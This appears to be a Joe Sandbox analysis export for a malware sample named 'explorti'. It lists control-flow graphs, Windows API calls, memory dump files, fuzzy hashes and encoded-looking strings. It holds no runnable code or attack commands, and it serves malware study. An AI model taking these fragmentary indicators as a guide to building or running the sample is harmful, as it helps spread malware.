                    control_flow_graph 1496 6c6c99-6c6ca5 1497 6c6cc4-6c6ce8 call 6c4020 1496->1497 1498 6c6ca7-6c6cc3 call 6c7430 call 6c7443 call 6c6b8a 1496->1498 1504 6c6cea-6c6d04 call 6c7430 call 6c7443 call 6c6b8a 1497->1504 1505 6c6d06-6c6d28 CreateFileW 1497->1505 1527 6c6d72-6c6d76 1504->1527 1506 6c6d38-6c6d3f call 6c6d77 1505->1506 1507 6c6d2a-6c6d2e call 6c6e01 1505->1507 1518 6c6d40-6c6d42 1506->1518 1514 6c6d33-6c6d36 1507->1514 1514->1518 1520 6c6d64-6c6d67 1518->1520 1521 6c6d44-6c6d61 call 6c4020 1518->1521 1525 6c6d69-6c6d6f 1520->1525 1526 6c6d70 1520->1526 1521->1520 1525->1526 1526->1527
                    Memory Dump Source
                    • Source File: 00000005.00000002.2902191514.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                    • Associated: 00000005.00000002.2902171081.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902191514.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902266457.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.0000000000967000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.0000000000997000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.00000000009AD000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902666548.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902854089.0000000000B50000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902880318.0000000000B52000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_690000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ed6498ac25813df91f6f1d59e70849eeb97a10402f63049144464a37fc38181c
                    • Instruction ID: 5a7aad142fc6ba8dd167c41fd0f04a55933a6d2bdd516a6178282991c23cf7b5
                    • Opcode Fuzzy Hash: ed6498ac25813df91f6f1d59e70849eeb97a10402f63049144464a37fc38181c
                    • Instruction Fuzzy Hash: 1921F831A052087AEB11BB64DC42FBE376BDF41338F10431DF9252B2D1DB70AE0596A9

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1530 6c6f71-6c6f87 1531 6c6f89-6c6f8d 1530->1531 1532 6c6f97-6c6fa7 1530->1532 1531->1532 1533 6c6f8f-6c6f95 1531->1533 1537 6c6fa9-6c6fbb SystemTimeToTzSpecificLocalTime 1532->1537 1538 6c6fe7-6c6fea 1532->1538 1534 6c6fec-6c6ff7 call 6acf21 1533->1534 1537->1538 1540 6c6fbd-6c6fdd call 6c6ff8 1537->1540 1538->1534 1542 6c6fe2-6c6fe5 1540->1542 1542->1534
                    APIs
                    • SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?), ref: 006C6FB3
                    Memory Dump Source
                    • Source File: 00000005.00000002.2902191514.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                    • Associated: 00000005.00000002.2902171081.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902191514.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902266457.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.0000000000967000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.0000000000997000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.00000000009AD000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902666548.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902854089.0000000000B50000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902880318.0000000000B52000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_690000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID: Time$LocalSpecificSystem
                    • String ID:
                    • API String ID: 2574697306-0
                    • Opcode ID: fcd095c9f9d02914c5232d05aad0d9096f4bf91d8b6c0046655879e451539437
                    • Instruction ID: 09912907d30fc434b4ace23da0857bda9014490b2ee228033ae34d8b399dd60e
                    • Opcode Fuzzy Hash: fcd095c9f9d02914c5232d05aad0d9096f4bf91d8b6c0046655879e451539437
                    • Instruction Fuzzy Hash: 2011DD7290020CABDB11DE95D940EEFB7BEEB08314F50526AF525E7180EB30EB44CBA5

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1543 6cd6ef-6cd6fa 1544 6cd6fc-6cd706 1543->1544 1545 6cd708-6cd70e 1543->1545 1544->1545 1546 6cd73c-6cd747 call 6c7443 1544->1546 1547 6cd727-6cd738 RtlAllocateHeap 1545->1547 1548 6cd710-6cd711 1545->1548 1553 6cd749-6cd74b 1546->1553 1550 6cd73a 1547->1550 1551 6cd713-6cd71a call 6c9c81 1547->1551 1548->1547 1550->1553 1551->1546 1556 6cd71c-6cd725 call 6c8cf9 1551->1556 1556->1546 1556->1547
                    APIs
                    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00000003,006CA5ED,?,006C74AE,?,00000000,?), ref: 006CD731
                    Memory Dump Source
                    • Source File: 00000005.00000002.2902191514.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                    • Associated: 00000005.00000002.2902171081.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902191514.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902266457.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.0000000000967000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.0000000000997000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.00000000009AD000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902666548.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902854089.0000000000B50000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902880318.0000000000B52000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_690000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocateHeap
                    • String ID:
                    • API String ID: 1279760036-0
                    • Opcode ID: d58e7a5259ffe23c511dcc8a9a0e9e0a5fefa6521aa6e873c548a11a2a80b62b
                    • Instruction ID: 749713c9ed72c8b894d2a5a11c1a9f9fd0b389af2971cf296e5d1d194fe5236e
                    • Opcode Fuzzy Hash: d58e7a5259ffe23c511dcc8a9a0e9e0a5fefa6521aa6e873c548a11a2a80b62b
                    • Instruction Fuzzy Hash: 6DF02731645225A69B313B269C05FBB7B9BDF817B0B18853DBC08EB281CF31E80186F4

                    Control-flow Graph

                    APIs
                    Memory Dump Source
                    • Source File: 00000005.00000002.2902191514.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                    • Associated: 00000005.00000002.2902171081.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902191514.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902266457.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.0000000000967000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.0000000000997000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.00000000009AD000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902666548.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902854089.0000000000B50000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902880318.0000000000B52000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_690000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: 35650d7b70ab283d47a96e1953d541791b2118bc4111a0ec7d1eed765f78b77b
                    • Instruction ID: 6a01c32350b1f7b856560e12a37e2f8b5d6a78cb6f3cd582240a24ea02f91cab
                    • Opcode Fuzzy Hash: 35650d7b70ab283d47a96e1953d541791b2118bc4111a0ec7d1eed765f78b77b
                    • Instruction Fuzzy Hash: CFF0D631E00604ABCB00BB689C1671D7B67A707720F84035CE811672D1DA745D018BE6
                    Memory Dump Source
                    • Source File: 00000005.00000002.2905077806.0000000004D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4d90000_explorti.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a4102fbd86b4d1196722d86c818b91e30b6822619e518786def86ec8935cc5a7
                    • Instruction ID: dc1038b879b070192c6290069f0389417811d7c77dd0d00805150b146f3d92da
                    • Opcode Fuzzy Hash: a4102fbd86b4d1196722d86c818b91e30b6822619e518786def86ec8935cc5a7
                    • Instruction Fuzzy Hash: FB0188EB208211BD750391417B10AF76BEFE5C6630730C436F443DA605E694DE4A7131
                    Memory Dump Source
                    • Source File: 00000005.00000002.2905077806.0000000004D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4d90000_explorti.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e5b366ddf577b18fb9391e5547ae3b73c3948e4a164884d1143de19a2b47a6c7
                    • Instruction ID: ce21a4a005d0c7bb75d3bad7e406091e742ee3a45e8cb8a1aaee721469f05104
                    • Opcode Fuzzy Hash: e5b366ddf577b18fb9391e5547ae3b73c3948e4a164884d1143de19a2b47a6c7
                    • Instruction Fuzzy Hash: DA0188EB208211BE750391417B10AF76BDFE5C6630730C436F443DAA05E6949D4A7131
                    Memory Dump Source
                    • Source File: 00000005.00000002.2905077806.0000000004D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4d90000_explorti.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 96b9572ac67bfcc7205d7d20f53f4f689b1bcdd69c55a6e9976e0cbf6db6de38
                    • Instruction ID: 1c386dc493c1ba9c1b477361bb46adbe9b8dd6feb303e54382a7e835037a48fa
                    • Opcode Fuzzy Hash: 96b9572ac67bfcc7205d7d20f53f4f689b1bcdd69c55a6e9976e0cbf6db6de38
                    • Instruction Fuzzy Hash: 1D0188EB208211BE750395417740AF66BDEE6C7630730C436F047DB705E5A89D4B7531
                    Memory Dump Source
                    • Source File: 00000005.00000002.2905077806.0000000004D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4d90000_explorti.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9ee44bd901d0fb701a8ae5f582f8355dab02aff9529898177137fe5073225d20
                    • Instruction ID: c77e97cf741f3a783c9cf6afb8b996b08bd1c91b40e4ca4ccaa1e7e349f1e98f
                    • Opcode Fuzzy Hash: 9ee44bd901d0fb701a8ae5f582f8355dab02aff9529898177137fe5073225d20
                    • Instruction Fuzzy Hash: 730149EB5483117EA20391813B11AFB6BAED4C6630330C437F802EA606E2998E4F6171
                    Memory Dump Source
                    • Source File: 00000005.00000002.2905077806.0000000004D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4d90000_explorti.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 51f7c57de09c0b40db340eefe4a447b112140818eeca624c8189834dd1487c22
                    • Instruction ID: cbb51e881c0266c63ad51ad6bd34b2401fa5ea3b365be86ed2cbd73b81baa3a4
                    • Opcode Fuzzy Hash: 51f7c57de09c0b40db340eefe4a447b112140818eeca624c8189834dd1487c22
                    • Instruction Fuzzy Hash: 23D0A79E588203D54543759121C15B86AA374131343304131F053FFF05F5DDDE573635
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.2902191514.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                    • Associated: 00000005.00000002.2902171081.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902191514.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902266457.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.0000000000967000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.0000000000997000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.00000000009AD000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902666548.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902854089.0000000000B50000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902880318.0000000000B52000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_690000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: #$0657d1$111$246122658369$EpPoaRV1$KIG+$KS==$SC==$UFy=$UVu=$d4o
                    • API String ID: 0-804117316
                    • Opcode ID: 9971a7a0a746ad29334c82cfbc6b18927b5e7c224c103ec30549ccec33d6e209
                    • Instruction ID: 575fd43791c7ebdbd33294a33b095391aa5972489900df0036b766e488ed894b
                    • Opcode Fuzzy Hash: 9971a7a0a746ad29334c82cfbc6b18927b5e7c224c103ec30549ccec33d6e209
                    • Instruction Fuzzy Hash: 4C72D270A04248DBEF14EF68C9497DDBBB7AB46304F50819CE805673C2D7799A88CF96
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.2902191514.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                    • Associated: 00000005.00000002.2902171081.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902191514.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902266457.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.0000000000967000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.0000000000997000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.00000000009AD000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902666548.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902854089.0000000000B50000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902880318.0000000000B52000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_690000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID: __floor_pentium4
                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                    • API String ID: 4168288129-2761157908
                    • Opcode ID: 6adc676493aff75b2927f9a1594a5a43ce928e576265c936c9514a3a914fb633
                    • Instruction ID: 481a9a6f25d0f6cf4ac74954f71b36ef0fdaa8b502305fb60039748ae587c47c
                    • Opcode Fuzzy Hash: 6adc676493aff75b2927f9a1594a5a43ce928e576265c936c9514a3a914fb633
                    • Instruction Fuzzy Hash: C7C22771E086288BDB65CE28DD407E9B3B6EB88305F1541EBD84DE7340EB75AE858F41
                    Memory Dump Source
                    • Source File: 00000005.00000002.2902191514.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                    • Associated: 00000005.00000002.2902171081.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902191514.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902266457.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.0000000000967000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.0000000000997000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.00000000009AD000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902666548.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902854089.0000000000B50000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902880318.0000000000B52000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_690000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
                    • Instruction ID: 60998cc8cda6f23429caa9d6f01c35885a8274d69feab9cc75d65384d0c47557
                    • Opcode Fuzzy Hash: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
                    • Instruction Fuzzy Hash: C1F13E71E0121A9FDF14CFA8C8906EEB7B2FF98314F15826AD419A7345D731AE41CB94
                    APIs
                    • ___std_exception_copy.LIBVCRUNTIME ref: 0069247E
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.2902191514.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                    • Associated: 00000005.00000002.2902171081.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902191514.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902266457.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.0000000000967000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.0000000000997000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.00000000009AD000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902666548.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902854089.0000000000B50000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902880318.0000000000B52000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_690000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID: ___std_exception_copy
                    • String ID: 'kjd+o$'kjd+o
                    • API String ID: 2659868963-2216729744
                    • Opcode ID: 78927e7b5d1bc852b2ca12038e14d09e5355d83a9d84214a39c52b97b1a790bb
                    • Instruction ID: da7155fe714a1112715dd99ff47a399a76986ce05bc8ea999211e64955021f88
                    • Opcode Fuzzy Hash: 78927e7b5d1bc852b2ca12038e14d09e5355d83a9d84214a39c52b97b1a790bb
                    • Instruction Fuzzy Hash: A751CEB2A006069FDB15EF58D8917AEBBF6FB08310F24856AD406EBB90D7349D50CF90
                    APIs
                    • GetSystemTimePreciseAsFileTime.KERNEL32(?,006ACE82,?,?,?,?,006ACEB7,?,?,?,?,?,?,006AC42D,?,00000001), ref: 006ACB33
                    Memory Dump Source
                    • Source File: 00000005.00000002.2902191514.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                    • Associated: 00000005.00000002.2902171081.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902191514.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902266457.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.0000000000967000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.0000000000997000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.00000000009AD000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902666548.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902854089.0000000000B50000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902880318.0000000000B52000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_690000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID: Time$FilePreciseSystem
                    • String ID:
                    • API String ID: 1802150274-0
                    • Opcode ID: f9ac0956989d0803f844efa8f65d7ce809d87bdcd41c21368d473faa11ee85ea
                    • Instruction ID: cdd58f4091847bcb019d2ee1fabdc7ad4883d416b9e5187328cf67ff0aebed2e
                    • Opcode Fuzzy Hash: f9ac0956989d0803f844efa8f65d7ce809d87bdcd41c21368d473faa11ee85ea
                    • Instruction Fuzzy Hash: 8AD022326026389BCB023F90BC04CECFB4F8B02B603010111EE06AB730CA52AC418FF1
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.2902191514.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                    • Associated: 00000005.00000002.2902171081.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902191514.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902266457.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.0000000000967000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.0000000000997000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.00000000009AD000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902666548.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902854089.0000000000B50000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902880318.0000000000B52000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_690000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 0
                    • API String ID: 0-4108050209
                    • Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                    • Instruction ID: 9a5972f5f6736f55ce4e334ce4ab453253d067b3158f71e53dcacacd2856df14
                    • Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                    • Instruction Fuzzy Hash: E151787220C6485ADB389A3888D6FFE6B9BDF69300F14045ED443D7782CA11ED45CF6A
                    Memory Dump Source
                    • Source File: 00000005.00000002.2902191514.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                    • Associated: 00000005.00000002.2902171081.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902191514.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902266457.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.0000000000967000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.0000000000997000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902292567.00000000009AD000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902666548.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902854089.0000000000B50000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.2902880318.0000000000B52000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_690000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2b8739c72cfacaf4ae64dc61c2de6b2ac445db9f744270c7377af843f3d93fa8
                    • Instruction ID: d484514e010bf946b1896dd7ffa97c507e3da068948bd234f0eba88b2dfc79d0
                    • Opcode Fuzzy Hash: 2b8739c72cfacaf4ae64dc61c2de6b2ac445db9f744270c7377af843f3d93fa8
                    • Instruction Fuzzy Hash: F8226FB3F515144BDB4CCE9DDCA27ECB2E3AFD8214B0E903DA40AE3345EA79D9158A44
                    Memory Dump Source
                    • Source File: 00000005.00000002.2902191514.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
